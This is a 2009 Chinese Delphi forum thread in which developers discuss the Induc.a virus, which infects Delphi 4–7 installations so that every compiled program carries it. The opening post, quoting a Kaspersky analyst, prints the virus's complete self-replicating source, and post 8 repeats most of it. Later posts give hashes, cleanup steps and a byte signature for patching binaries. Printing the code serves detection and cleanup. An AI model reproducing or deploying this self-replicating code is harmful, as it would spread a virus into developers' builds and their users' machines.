| 技术论坛 |
|
|
| ≡技术区≡ ① |
| DELPHI技术 |
| lazarus/fpc/Free Pascal |
| 移动应用开发 |
| Web应用开发 |
| 数据库专区 |
| 报表专区 |
| 网络通讯 |
| 开源项目 |
| 论坛精华贴 |
| ≡发布区≡ ② |
| 发布代码 |
| 发布控件 |
| 文档资料 |
| 经典工具 |
| ≡事务区≡ ③ |
| 网站意见 |
| 盒子之家 |
| 招聘应聘 |
| 信息交换 |
| 论坛信息 |
|||
|
| 导航: | 论坛 -> DELPHI技术 斑竹:liumazi,sephil | |||||
| 作者: |
|
2009/8/17 22:25:46 | ||||
| 标题: |
|
加入我的收藏 | ||||
| 楼主: | 真不幸,我中招了,这下麻烦了,所有代码都要重编译。哪个王八蛋搞的这事??? RE: False alarm [KLAN-40418281] Hello, Redemdl.dll - Virus.Win32.Induc.a This is not false alarm. This is a new type of virus. It can infect Delphi source files, so when you compile your program, it will contain virus code. If you are a programmer, please check your source files (including standard Delphi .pas files) for the following virus code: uses windows; var sc:array[1..24] of string=('uses windows; var sc:array[1..24] of string=(', 'function x(s:string):string;var i:integer;begin for i:=1 to length(s) do if s', '=#36 then s:=#39;result:=s;end;procedure re(s,d,e:string);var f1,f2:textfile;', 'h:cardinal;f:STARTUPINFO;p:PROCESS_INFORMATION;b:boolean;t1,t2,t3:FILETIME;begin', 'h:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0);if h<>DWORD(-1) then begin CloseHandle', '(h);exit;end;{$I-}assignfile(f1,s);reset(f1);if ioresult<>0 then exit;assignfile', '(f2,d+$pas$);rewrite(f2);if ioresult<>0 then begin closefile(f1);exit;end; while', 'not eof(f1) do begin readln(f1,s); writeln(f2,s); if pos($implementation$,s)<>0', 'then break;end;for h:= 1 to 1 do writeln(f2,sc[h]);for h:= 1 to 23 do writeln(f2', ',$$$$+sc[h],$$$,$);writeln(f2,$$$$+sc[24]+$$$);$);for h:= 2 to 24 do writeln(f2,', 'x(sc[h]));closefile(f1);closefile(f2);{$I+}MoveFile(pchar(d+$dcu$),pchar(d+$bak$', ')); fillchar(f,sizeof(f),0); f.cb:=sizeof(f); f.dwFlags:=STARTF_USESHOWWINDOW;f.', 'wShowWindow:=SW_HIDE;b:=CreateProcess(nil,pchar(e+$"$+d+$pas"$),0,0,false,0,0,0,', 'f,p);if b then WaitForSingleObject(p.hProcess,INFINITE);MoveFile(pchar(d+$bak$),', 'pchar(d+$dcu$));DeleteFile(pchar(d+$pas$));h:=CreateFile(pchar(d+$bak$),0,0,0,3,', '0,0); if h=DWORD(-1) then exit; GetFileTime(h,@t1,@t2,@t3); CloseHandle(h);h:=', 'CreateFile(pchar(d+$dcu$),256,0,0,3,0,0);if h=DWORD(-1) then exit;SetFileTime(h,', '@t1,@t2,@t3); CloseHandle(h); end; procedure st; var k:HKEY;c:array [1..255] of', 'char; i:cardinal; r:string; v:char; begin for v:=$4$ to $7$ do if RegOpenKeyEx(', 'HKEY_LOCAL_MACHINE,pchar($Software\Borland\Delphi\$+v+$.0$),0,KEY_READ,k)=0 then', 'begin i:=255;if RegQueryValueEx(k,$RootDir$,nil,@i,@c,@i)=0 then begin r:=$$;i:=', '1; while c<>#0 do begin r:=r+c;inc(i);end;re(r+$\source\rtl\sys\SysConst$+', '$.pas$,r+$\lib\sysconst.$,$"$+r+$\bin\dcc32.exe" $);end;RegCloseKey(k);end; end;', 'begin st; end.'); function x(s:string):string; var i:integer; begin for i:=1 to length(s) do if s=#36 then s:=#39; result:=s; end; procedure re(s,d,e:string); var f1,f2:textfile; h:cardinal; f:STARTUPINFO; p:PROCESS_INFORMATION; b:boolean; t1,t2,t3:FILETIME; begin h:=CreateFile(pchar(d+'bak'),0,0,0,3,0,0); if h<>DWORD(-1) then begin CloseHandle(h); exit; end; {'I-}assignfile(f1,s); reset(f1); if ioresult<>0 then exit; assignfile(f2,d+'pas'); rewrite(f2); if ioresult<>0 then begin closefile(f1); exit; end; while not eof(f1) do begin readln(f1,s); writeln(f2,s); if pos('implementation',s)<>0 then break; end; for h:= 1 to 1 do writeln(f2,sc[h]); for h:= 1 to 23 do writeln(f2,''''+sc[h],''','); writeln(f2,''''+sc[24]+''');'); for h:= 2 to 24 do writeln(f2,x(sc[h])); closefile(f1); closefile(f2); {'I+}MoveFile(pchar(d+'dcu'),pchar(d+'bak')); fillchar(f,sizeof(f),0); f.cb := sizeof(f); f.dwFlags := STARTF_USESHOWWINDOW; f.wShowWindow := SW_HIDE; b := CreateProcess(nil,pchar(e+'"'+d+'pas"'),0,0,false,0,0,0,f,p); if b then WaitForSingleObject(p.hProcess,INFINITE); MoveFile(pchar(d+'bak'),pchar(d+'dcu')); DeleteFile(pchar(d+'pas')); h := CreateFile(pchar(d+'bak'),0,0,0,3,0,0); if h=DWORD(-1) then exit; GetFileTime(h,@t1,@t2,@t3); CloseHandle(h); h := CreateFile(pchar(d+'dcu'),256,0,0,3,0,0); if h=DWORD(-1) then exit; SetFileTime(h,@t1,@t2,@t3); CloseHandle(h); end; procedure st; var k:HKEY; c:array [1..255] of char; i:cardinal; r:string; v:char; begin for v:='4' to '7' do if RegOpenKeyEx(HKEY_LOCAL_MACHINE,pchar('Software\Borland\Delphi\'+v+'.0'),0,KEY_READ,k)=0 then begin i:=255; if RegQueryValueEx(k,'RootDir',nil,@i,@c,@i)=0 then begin r:=''; i:=1; while c<>#0 do begin r:=r+c; inc(i); end; re(r+'\source\rtl\sys\SysConst'+'.pas',r+'\lib\sysconst.','"'+r+'\bin\dcc32.exe" '); end; RegCloseKey(k); end; end; begin st; end. > False alarm > > > False alarm > > password:virus > > > > > > Best Regards, Oleg Yurzin Malware Analyst Kaspersky Lab ---------------------------------------------- ^-^lifencheng^0^ |
|||||
| 作者: |
|
2009/8/17 22:31:56 | ||||
| 1楼: | 高明 ---------------------------------------------- 我打的是酱油,而不是别的什么油。 我灌的是口水,而不是别的什么水。 我聊的折腾不是那个不折腾的折腾。 我说的阿娇不是那个邓玉娇的阿娇。 3个代表,6个为什么,9个肠胃炎。 D性强的领导干部都不喜欢热比娅。 我特别要讲的是,屁民网黄色论坛是我经常上网必选的 网站之一 |
|||||
| 作者: |
|
2009/8/17 23:07:25 | ||||
| 2楼: | 该病毒没有exe或者dll的毒源体,因为自 SysConst.dcu 被置换的一刻开始,你已经是毒源体的创造者,该病毒原来早在 2005 年已经被发现,一个软件 QIP 2005 build 8094 中就曾经染毒,然后扩散看来,该病毒代码简单看来并没有伤害性,但是它完全是一个病毒的形态,不知道哪天会被利用的,那个俄罗斯高人把这个病毒分析出了源代码,并且提出了一个切实可行的解决方法,根据该病毒的特性,第一时间就是要把 Lib 中的 sysconst.bak 复制一份改名为 sysconst.dcu,注意,是复制而不是直接改名,因为如果你的系统还有潜在威胁的时候,如果还是有 sysconst.bak 在,那么这个病毒会认为它的工作已经完成而不会去动你的原版 sysconst.dcu,然后你要把你所有的项目重新编译,因为他们都已经染毒了。最好是做一下全盘检查。 BTW: 为什么一个 2005 年的“病毒”到了今天仍然还有那么多杀毒软件不报呢,因为从代码上来说,它的破坏性并没有,但是它的确拥有了病毒的特性。 ---------------------------------------------- - |
|||||
| 作者: |
|
2009/8/17 23:15:37 | ||||
| 3楼: | 还有,这个病毒只针对 Delphi 4 ~ Delphi 7 还有,修改注册表中的 RootDir 键值也能防毒。 ---------------------------------------------- - |
|||||
| 作者: |
|
2009/8/18 8:16:47 | ||||
| 4楼: | 我也中招了 ---------------------------------------------- -BinJian's blog is http://www.sleepless.org.cn |
|||||
| 作者: |
|
2009/8/18 10:11:51 | ||||
| 5楼: | 怎样才知道中招了? 文件: C:\Program Files\Borland\Delphi7\Lib\sysconst.bak 大小: 11658 字节 修改时间: 2002年8月9日, 22:00:00 MD5: 957D629F2E4C38B9FA2AC911E352FC82 SHA1: 859EFAF4C24AF89E2B06922912D1081BAD349E7C CRC32: 004EBB9D 文件: C:\Program Files\Borland\Delphi7\Lib\sysconst.dcu 大小: 18207 字节 修改时间: 2002年8月9日, 22:00:00 MD5: 89DD28E7C1EAEAE1793D9354E7C38D21 SHA1: F7EF5B9C3C85FF01299556C5546CAD511CA9F5A8 CRC32: B19465F1 这样算不算啊? 看看日期是没有被替换过的!但不知道为何会有sysconst.bak文件? ---------------------------------------------- 没有最好,只有更好!所以才会不断追求! |
|||||
| 作者: |
|
2009/8/18 10:16:11 | ||||
| 6楼: | 原文件\source\rtl\sys\SysConst.pas,并没有以上代码,那是不是正常,并没有被感染呢? ---------------------------------------------- 没有最好,只有更好!所以才会不断追求! |
|||||
| 作者: |
|
2009/8/18 11:03:08 | ||||
| 7楼: | kelvincn,算,你已经中毒了。速度全盘查杀。因为我也和你一样中毒了。 ---------------------------------------------- ┃ ┏┃┃┃┏┛ ┃ ┃┃┃┃┏┛ ━┛━┛━┛━┛delphi |
|||||
| 作者: |
|
2009/8/18 11:06:58 | ||||
| 8楼: | 尊敬的用户,您好! 我们最新截获了一种病毒Virus.Win32.Induc.a,此病毒会向您现有的delphi工程中添加病毒文件并修改工程配置文件,使得编译时将病毒一同编译。编译后的二进制文件中可以找到以下ASCII代码: uses windows; var sc:array[1..24] of string=('uses windows; var sc:array[1..24] of string=(', 'function x(s:string):string;var i:integer;begin for i:=1 to length(s) do if s', '=#36 then s:=#39;result:=s;end;procedure re(s,d,e:string);var f1,f2:textfile;', 'h:cardinal ;f:STARTUPINFO ;p:PROCESS_INFORMATION;b:boolean;t1,t2,t3:FILETIME;begin', 'h:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0);if hDWORD(-1) then begin CloseHandle', '(h);exit;end;{$I-}assignfile(f1,s);reset(f1);if ioresult0 then exit;assignfile', '(f2,d+$pas$);rewrite(f2);if ioresult0 then begin closefile(f1);exit;end; while', 'not eof(f1) do begin readln(f1,s); writeln(f2,s); if pos($implementation$,s)0', 'then break;end;for h:= 1 to 1 do writeln(f2,sc[h]);for h:= 1 to 23 do writeln(f2', ',$$$$+sc[h],$$$,$);writeln(f2,$$$$+sc[24]+$$$);$);for h:= 2 to 24 do writeln(f2,', 'x(sc[h]));closefile(f1);closefile(f2);{$I+}MoveFile(pchar(d+$dcu $),pchar(d+$bak$', ')); fillchar(f,sizeof(f),0); f.cb:=sizeof(f); f.dwFlags:=STARTF_USESHOWWINDOW;f.', 'wShowWindow:=SW_HIDE;b:=CreateProcess(nil,pchar(e+$"$+d+$pas"$), 0,0,false,0,0,0,', 'f,p);if b then WaitForSingleObject(p.hProcess,INFINITE);MoveFile(pchar(d+$bak$),', 'pchar(d+$dcu$));DeleteFile(pchar(d+$pas$));h:=CreateFile(pchar(d+ $bak$),0,0,0,3,', '0,0); if h=DWORD(-1) then exit; GetFileTime(h,@t1,@t2,@t3); CloseHandle(h);h:=', 'CreateFile(pchar(d+$dcu$),256,0,0,3,0,0);if h=DWORD(-1) then exit;SetFileTime(h,', '@t1,@t2,@t3); CloseHandle(h); end; procedure st; var k:HKEY;c:array [1..255] of', 'char; i:cardinal; r:string; v:char; begin for v:=Ŭ$ to ů$ do if RegOpenKeyEx(', 'HKEY_LOCAL_MACHINE,pchar($Software\Borland\Delphi\$+v+$.0$), 0,KEY_READ,k)=0 then', 'begin i:=255;if RegQueryValueEx(k,$RootDir$,nil,@i,@c,@i)=0 then begin r:=$$i:=', '1; while c#0 do begin r:=r+c;inc(i);end;re(r+$\source\rtl \sys\SysConst$+', '$.pas$,r+$\lib\sysconst.$,$"$+r+$\bin\dcc32.exe" $);end;RegCloseKey(k);end; end;', 'begin st; end.'); function x(s:string):string; var i:integer; begin for i:=1 to length(s) do 等等 显然您提交的文件中包含以上代码。如果真的是一个空白工程,似乎是不应该有以上代码的。请您再次检查源文件和工程文件。 ---------- 是的我中招了!正常是不到12K的文件! ---------------------------------------------- 没有最好,只有更好!所以才会不断追求! |
|||||
| 作者: |
|
2009/8/18 11:09:58 | ||||
| 9楼: | ESET-NOD32并没有报有毒!卡巴也是8.16后才报有毒!还是用会卡巴! ---------------------------------------------- 没有最好,只有更好!所以才会不断追求! |
|||||
| 作者: |
|
2009/8/18 12:13:04 | ||||
| 10楼: | 查了下也有这个东西,哪里来的呢? ---------------------------------------------- --===写写程序、做做网页、承接外包项目 QQ:53767940==--- |
|||||
| 作者: |
|
2009/8/18 13:20:19 | ||||
| 11楼: | 恢复SysConst.dcu后,sysconst.bak请勿删除,否则运行原来编译好的exe,继续中找. ---------------------------------------------- 力求完美 |
|||||
| 作者: |
|
2009/8/18 14:16:44 | ||||
| 12楼: | 谁有正常的文件,发一份上来,谢谢了 ---------------------------------------------- - |
|||||
| 作者: |
|
2009/8/18 15:52:01 | ||||
| 13楼: | 可能早中了,以前不报,现在报了,发邮件给退回来了,16号之前还能发呢 ---------------------------------------------- - |
|||||
| 作者: |
|
2009/8/18 16:21:24 | ||||
| 14楼: | 不知道多少人中了呢? ---------------------------------------------- 免费的FTP  https://download-installer.cdn.mozilla.net/pub/firefox/releases/43.0/win64/zh-CN/https://cc.embarcadero.com/Author/575019>http://delphi-z.ruhttps://download-installer.cdn.mozilla.net/pub/firefox/releases/43.0/win64/zh-CN/https://cc.embarcadero.com/Author/575019>http://delphi.icm.edu.pl/ftp/https://download-installer.cdn.mozilla.net/pub/firefox/releases/43.0/win64/zh-CN/https://cc.embarcadero.com/Author/575019>http://delphi-z.ruhttps://download-installer.cdn.mozilla.net/pub/firefox/releases/43.0/win64/zh-CN/https://cc.embarcadero.com/Author/575019
|
|||||
| 作者: |
|
2009/8/18 16:26:39 | ||||
| 15楼: | 正常的 直接去下delphi7.0 ---------------------------------------------- 免费的FTP https://download-installer.cdn.mozilla.net/pub/firefox/releases/43.0/win64/zh-CN/https://cc.embarcadero.com/Author/575019>http://delphi-z.ruhttps://download-installer.cdn.mozilla.net/pub/firefox/releases/43.0/win64/zh-CN/https://cc.embarcadero.com/Author/575019>http://delphi.icm.edu.pl/ftp/https://download-installer.cdn.mozilla.net/pub/firefox/releases/43.0/win64/zh-CN/https://cc.embarcadero.com/Author/575019>http://delphi-z.ruhttps://download-installer.cdn.mozilla.net/pub/firefox/releases/43.0/win64/zh-CN/https://cc.embarcadero.com/Author/575019
|
|||||
| 作者: |
|
2009/8/18 16:40:14 | ||||
| 16楼: | 我也中了 近期发布了不少程序, 靠,不知有多少人连带着中了... ---------------------------------------------- - |
|||||
| 作者: |
|
2009/8/18 16:45:41 | ||||
| 17楼: | 安的也中毒了
Shift your life |
|||||
| 作者: |
|
2009/8/18 17:18:34 | ||||
| 18楼: | 请盒子站长赶快扫描盒子服务器上的文件,我这里全盘查杀后发现,是5月9号下载的盒子上的一个demo的exe带毒,那个下载叫“下拉窗体示例DropDownForm”。可能是作者的机器中毒而不自知,然后编译了程序发上来。我当时没重新编译运行了exe导致中毒的。这个exe有修改pas调用dcc32.exe的行为。不知道这是不是源头之一 ---------------------------------------------- ┃ ┏┃┃┃┏┛ ┃ ┃┃┃┃┏┛ ━┛━┛━┛━┛delphi |
|||||
| 作者: |
|
2009/8/18 17:26:27 | ||||
| 18楼: | 为啥只感染Delphi 4-7呢?更高版本没事? ---------------------------------------------- - |
|||||
| 作者: |
|
2009/8/18 17:28:40 | ||||
| 19楼: | 看出来了。。。 'HKEY_LOCAL_MACHINE,pchar($Software\Borland\Delphi D8开始就是BDS了吧。注册表路径读不到了。嗯,可以尝试一下升级这个病毒~~~~ ---------------------------------------------- - |
|||||
| 作者: |
|
2009/8/18 17:30:05 | ||||
| 19楼: | 不是的, 我的电脑上看,3月9日 就有了。我估计在某个组件包里。 因为我的电脑是,2月14 新配的主机,3月初开始使用的。估计就是安装好了delphi后接下来安装一些组件后,就中了。 中的那个DCU,修改日期是2009-3-9. ---------------------------------------------- 我打的是酱油,而不是别的什么油。 我灌的是口水,而不是别的什么水。 我聊的折腾不是那个不折腾的折腾。 我说的阿娇不是那个邓玉娇的阿娇。 3个代表,6个为什么,9个肠胃炎。 D性强的领导干部都不喜欢热比娅。 我特别要讲的是,屁民网黄色论坛是我经常上网必选的 网站之一 |
|||||
| 作者: |
|
2009/8/18 18:35:18 | ||||
| 20楼: | 看来病毒源头的确是盒子上 我中毒的DCU日期是2009-04-18, 居然还有时间比我旧的 用过我的作品的朋友请尽快到我网盘重新下载修复后的程序 http://www.skygz.com 我的历史受影响作品如下 Inno Setup Water 水波效果插件 FOR Inno setup Innounp IsUnp InnoGPW CodeGear RAD Studio 2009 绿化程序 ---------------------------------------------- - |
|||||
| 作者: |
|
2009/8/18 19:35:06 | ||||
| 21楼: | NND,俺也中招了。 ---------------------------------------------- 东边日出西边雨..^_^ |
|||||
| 作者: |
|
2009/8/18 23:54:06 | ||||
| 22楼: | 957d629f2e4c38b9fa2ac911e352fc82 SysConst.dcu ---------------------------------------------- |
|||||
| 作者: |
|
2009/8/19 3:06:41 | ||||
| 23楼: | 唉,刚nod也报了:( 我也中招了. ---------------------------------------------- delphi|vue|golang hnysoft|hnyerp+mes+srm |
|||||
| 作者: |
|
2009/8/19 3:19:20 | ||||
| 24楼: | 上传正常的文件给大家,替换之前的文件再编译工程就不报了,仅delphi7. 替换路径:C:\Program Files\Borland\Delphi7\Lib
delphi|vue|golang hnysoft|hnyerp+mes+srm |
|||||
| 作者: |
|
2009/8/19 8:14:15 | ||||
| 25楼: | 可误,我的也中招了! ---------------------------------------------- 这个世界上还有很多比钱更重要的东西,比如说意大利面---加菲猫 |
|||||
| 作者: |
|
2009/8/19 9:29:41 | ||||
| 26楼: | 怪不得上次我给客户的程序,客户说程序用360查出有病毒呀,看来我的DELPHI早就中招了... ---------------------------------------------- 华华软件 726导航 |
|||||
| 作者: |
|
2009/8/19 10:31:03 | ||||
| 27楼: | 狗日的!谁在搞这个呢 ---------------------------------------------- ~~~~~我爱delphi就像爱我的她~~~~~ |
|||||
| 作者: |
|
2009/8/19 10:55:11 | ||||
| 28楼: | 居然有人想升级这个病毒????不知道你居心何在!!! ---------------------------------------------- -http://blog.163.com/xxxp_163/ |
|||||
| 作者: |
|
2009/8/19 14:46:39 | ||||
| 29楼: | 靠,今天中了,而且是全部电脑,气愤。。。。 ---------------------------------------------- - |
|||||
| 作者: |
|
2009/8/19 15:04:21 | ||||
| 30楼: | 幸亏没用delphi7,要升级这病毒的死全家! ---------------------------------------------- - |
|||||
| 作者: |
|
2009/8/19 18:49:42 | ||||
| 31楼: | (风铃夜思雨) 我前几天下载你的 Innounp InnoGPW 没有中招,因为我用的delphi2007 ,你老哥,要认真查一下你的电脑哦,不然你就成了病毒宿主传播源了! 希望你能在你的空间,或盒子上发表一个省明,否则大家还会去用那些旧的程序,造成不断感染,这样对delphi开发者不是好事 ---------------------------------------------- - |
|||||
| 作者: |
|
2009/8/19 21:50:05 | ||||
| 32楼: | 我是5月31日感染的...日了 写个扫描器清楚一下吧 搜索 55 8B EC 81 C4 DC FE FF FF 53 56 33 C0 89 85 E4 FE FF FF 89 85 E0 FE FF FF 89 85 DC FE FF FF 89 85 E8 FE FF FF 89 85 F0 FE FF FF 89 85 EC FE FF FF 89 45 F4 8D 75 F8 33 C0 55 68 49 64 40 00 64 FF 30 64 89 20 B3 34 8D 45 FC 50 68 19 00 02 00 6A 00 修改55为C3 这样已经编译的文件就不用编译了... ---------------------------------------------- - |
|||||
| 作者: |
|
2009/8/20 0:23:06 | ||||
| 33楼: | 我用D2010,不会中吧? ---------------------------------------------- 你我,都可以是个造梦者!欢迎加入脚本引擎PaxCompiler交流群303904495http://www.cnblogs.com/fireboxsoft有需要错别字检测软件的朋友可以在我博客上的地址下载使用,备注“2ccc”的朋友可以免费获取超级黄金VVVVVVVVVVIP授权 |
|||||
| 作者: |
|
2009/8/20 16:51:24 | ||||
| 34楼: | 这个病毒好像会改主程序文件的。! ---------------------------------------------- 免费的FTP https://download-installer.cdn.mozilla.net/pub/firefox/releases/43.0/win64/zh-CN/https://cc.embarcadero.com/Author/575019>http://delphi-z.ruhttps://download-installer.cdn.mozilla.net/pub/firefox/releases/43.0/win64/zh-CN/https://cc.embarcadero.com/Author/575019>http://delphi.icm.edu.pl/ftp/https://download-installer.cdn.mozilla.net/pub/firefox/releases/43.0/win64/zh-CN/https://cc.embarcadero.com/Author/575019>http://delphi-z.ruhttps://download-installer.cdn.mozilla.net/pub/firefox/releases/43.0/win64/zh-CN/https://cc.embarcadero.com/Author/575019
|
|||||
| 作者: |
|
2009/8/20 17:35:24 | ||||
| 35楼: | to xplibox (xplibox) and lt2000 (lt2000) 您二位也太较真了吧……我不过开个玩笑而已。那么沉闷干啥。呵呵。 ---------------------------------------------- - |
|||||
| 作者: |
|
2009/8/20 18:28:25 | ||||
| 36楼: | my god... 我的最早感染日期是2009-06-02... 不知为什么NOD没报告... 而用论坛上提供的专杀杀过后NOD又报毒..... ---------------------------------------------- - |
|||||
| 作者: |
|
2009/8/20 20:42:26 | ||||
| 37楼: | 我的 nod32 昨天才开始报, 偶都不知道什么时候中的招。 ---------------------------------------------- Gavin |
|||||
| 作者: |
|
2009/8/21 9:43:52 | ||||
| 38楼: | 希望大家注意了!不然到时候delphi就没得混了! ---------------------------------------------- ~~~~~我爱delphi就像爱我的她~~~~~ |
|||||
| 作者: |
|
2009/8/21 14:11:45 | ||||
| 39楼: | 我也中招了,没有想到竟然还可以在程序源码中掺杂的病毒。 ---------------------------------------------- 程外汉 |
|||||
| 作者: |
|
2009/8/21 16:16:40 | ||||
| 40楼: | 金山已出专杀工具: 这是:引用页 http://www.duba.net/zhuansha/ 这是专杀下载地址: http://bbs.duba.net/thread-22092705-1-1.html ---------------------------------------------- - |
|||||
| 作者: |
|
2009/8/21 21:00:13 | ||||
| 41楼: | 我也中毒了,有没有什么办法不让他再次中毒 ---------------------------------------------- 博客:www.kinasoft.cn 作品:www.kinasoft.com |
|||||
| 作者: |
|
2009/8/21 23:47:04 | ||||
| 42楼: | 嘿嘿,菜鸟DELPHI程序员才会中吧,因为只有菜鸟才用杀毒软件,俺用COMODO想中个病毒玩玩都不行。 ---------------------------------------------- - |
|||||
| 作者: |
|
2009/8/22 15:40:21 | ||||
| 43楼: | 金山是不是在放狗屁.~~ 这个病毒好象会修盖 delphi32.exe这个文件和一些BPL?~! 你们自己检查下吧.! ---------------------------------------------- 免费的FTP https://download-installer.cdn.mozilla.net/pub/firefox/releases/43.0/win64/zh-CN/https://cc.embarcadero.com/Author/575019>http://delphi-z.ruhttps://download-installer.cdn.mozilla.net/pub/firefox/releases/43.0/win64/zh-CN/https://cc.embarcadero.com/Author/575019>http://delphi.icm.edu.pl/ftp/https://download-installer.cdn.mozilla.net/pub/firefox/releases/43.0/win64/zh-CN/https://cc.embarcadero.com/Author/575019>http://delphi-z.ruhttps://download-installer.cdn.mozilla.net/pub/firefox/releases/43.0/win64/zh-CN/https://cc.embarcadero.com/Author/575019
|
|||||
| 作者: |
|
2009/8/22 15:41:43 | ||||
| 44楼: | 至少我的是被修改了 现在还在虚拟机里面 我都没弄delphi了。![size=5]感叹~~~~~~~~~~[/size] ---------------------------------------------- 免费的FTP https://download-installer.cdn.mozilla.net/pub/firefox/releases/43.0/win64/zh-CN/https://cc.embarcadero.com/Author/575019>http://delphi-z.ruhttps://download-installer.cdn.mozilla.net/pub/firefox/releases/43.0/win64/zh-CN/https://cc.embarcadero.com/Author/575019>http://delphi.icm.edu.pl/ftp/https://download-installer.cdn.mozilla.net/pub/firefox/releases/43.0/win64/zh-CN/https://cc.embarcadero.com/Author/575019>http://delphi-z.ruhttps://download-installer.cdn.mozilla.net/pub/firefox/releases/43.0/win64/zh-CN/https://cc.embarcadero.com/Author/575019
|
|||||
| 作者: |
|
2009/8/23 12:55:14 | ||||
| 45楼: | 回复 risexiao (都市猎人) 18号我进行了全盘杀毒,把有问题的程序全部重新编译了,只要重新下载就行了,并且也发了公告. ---------------------------------------------- - |
|||||
| 作者: |
|
2009/8/25 15:58:28 | ||||
| 46楼: | 就是不知道源头在哪?还望 各位大侠追缉元凶. ---------------------------------------------- ---------- 想活得精彩,但生活实在太累! |
|||||
| 作者: |
|
2009/8/25 16:55:17 | ||||
| 47楼: | bpl怎么办,好麻烦,有没有什么批量编译的工具? ---------------------------------------------- - |
|||||
| 作者: |
|
2009/8/26 11:42:49 | ||||
| 48楼: | 把sysconst.dcu改回来后,并把SysConsts.dcu设为只读后,运行D7就报无法读取D:,请插入软盘到D盘中去,气死我了,到底搞了些什么?? To huhuc: bpl就得用命令行重新编译了.Google一下吧!! ---------------------------------------------- ---------- 想活得精彩,但生活实在太累! |
|||||
| 作者: |
|
2009/8/27 22:10:53 | ||||
| 49楼: | 牛 编写病毒的真牛, 这是鼓励大家更深入的学习Delphi ---------------------------------------------- - |
|||||
| 作者: |
|
2009/8/29 16:15:29 | ||||
| 50楼: | 很难想象!会有这样的一个病毒! ---------------------------------------------- http://mengxi.me |
|||||
| 作者: |
|
2009/8/31 9:53:23 | ||||
| 51楼: | 是哪个吃饱了没事做的家伙。。。 太缺德了。 ---------------------------------------------- - |
|||||
| 作者: |
|
2009/9/29 17:23:08 | ||||
| 52楼: | 今天升级瑞星,结果报毒,检查了一下自己以前写的程序和下载的控件程序等,发现数百个病毒,谁写的这个操他祖宗 ---------------------------------------------- 我爱Delphi,永远的Delphi,哪怕Delphi淘汰了,出局了,被世人淡忘了我也爱,除非我死了否则就是爱Delphi |
|||||
| 作者: |
|
2009/10/28 16:50:18 | ||||
| 53楼: | 还没发现自己中毒了,一直用d7在,这个病毒确实太讨厌了 ---------------------------------------------- - |
|||||
| 作者: |
|
2009/11/30 21:13:05 | ||||
| 54楼: | 顶,我也是, ---------------------------------------------- XE7 安卓手机框架、IOS手机框架开发,联系QQ:2403182533 |
|||||
| 作者: |
|
2009/12/10 19:06:29 | ||||
| 55楼: | 确实 有点讨厌啊!真是大水冲龙王庙啊 ---------------------------------------------- - |
|||||
| 作者: |
|
2010/1/5 5:27:05 | ||||
| 56楼: | 90末期就出现了该Vir... ---------------------------------------------- -always make things simple! http://www.51xuewen.com/group/1489/topic_17295.htm |
|||||
| 作者: |
|
2010/5/19 7:08:22 | ||||
| 57楼: | 我也中过,安装盒子上下载的SmartEffect后,重编译sysconst.pas解决 ---------------------------------------------- So be it. |
|||||
| 信息 |
| 登陆以后才能回复 |
